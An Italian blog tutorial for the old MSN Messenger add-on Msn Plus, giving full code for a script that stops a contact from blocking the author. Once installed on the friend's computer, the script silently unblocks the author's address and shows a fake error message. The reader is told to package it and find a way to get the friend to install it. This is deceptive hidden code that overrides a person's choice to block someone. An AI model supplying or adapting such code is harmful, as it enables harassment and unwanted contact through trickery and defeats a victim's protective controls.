Ebbene si, esiste un metodo testato e sperimentato da Informaticaon che permette di non farci bloccare su MSN.Per fare questo, è necessario che l’amico da cui non vogliamo essere bloccati, abbia installato sul suo computer il programma Msn Plus, e che questo amico installi un determinato “script” che dovremo inviare noi stessi. Per tutto il tempo che il nostro amico terrà installato e attivo questo “script”, non potrà bloccarci!Come si fà?Nulla di cosi complicato!

Per prima cosa apri il “Blocco Note” o “Wordpad” e incollaci dentro il codice seguente:

<?xml version=”1.0″?>
<scriptinfo xmlns=”urn:msgplus:scripts” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance&#8221; Version=”1.2″>
<information>
<name>MsnPlusAntiBlock </name>
<description>rende imbloccabili</description>
<abouturl>TUAMAIL</abouturl>
</information>
</scriptinfo>

Dovrai sostituire al posto della dicitura TUAMAIL, il tuo indirizzo email (che l’amico non riuscirà a bloccare). Dopo aver incollato quel codice e aver sostituito la dicitura, salva il file e rinominalo in ScritpInfo.xml (fai attenzione alle maiuscole e all’estensione altrimenti non funzionerà!).

Ora apri nuovamente il “Blocco Note” o “Wordpad” e incollaci dentro il codice seguente:

var ml = “TUAMAIL”;
function Debug(msg){
msg = MsgPlus.RemoveFormatCodes(msg);
MsgPlus.DisplayToast(“Msn Plus! Live”, msg, “”);
}
function OnEvent_ContactBlocked(mail){
if (mail == ml){
Debug(“Errore 81ef91d \n Impossibile bloccare o rimuovere contatto. \n Etto è imbloccabile. \n Riprovare più tardi”);
Contact = Messenger.MyContacts.GetContact(mail);
Contact.Blocked = false;
}
}

Anche questa volta dovrai sostituire al posto della dicitura TUAMAIL, il tuo indirizzo email (che l’amico non riuscirà a bloccare). Dopo aver incollato quel codice e aver sostituito la dicitura, salva il file e rinominalo antiblock.js

A questo punto prendi i due file appena creati e li metti insieme in un archivio compresso .ZIP o .RAR (add to zip). Dopo aver creato il file compresso, rinominlo in: quellochevuoi.plsc

Ora non ti resta altro che trovare il modo di inviare e far installare il file (che è uno script per msn plus) all’ amico da cui non ti vuoi far bloccare.

Se per caso qualche amico ti ha inviato qualche script per msn plus e l’hai installato… verifica che non sia proprio questo!!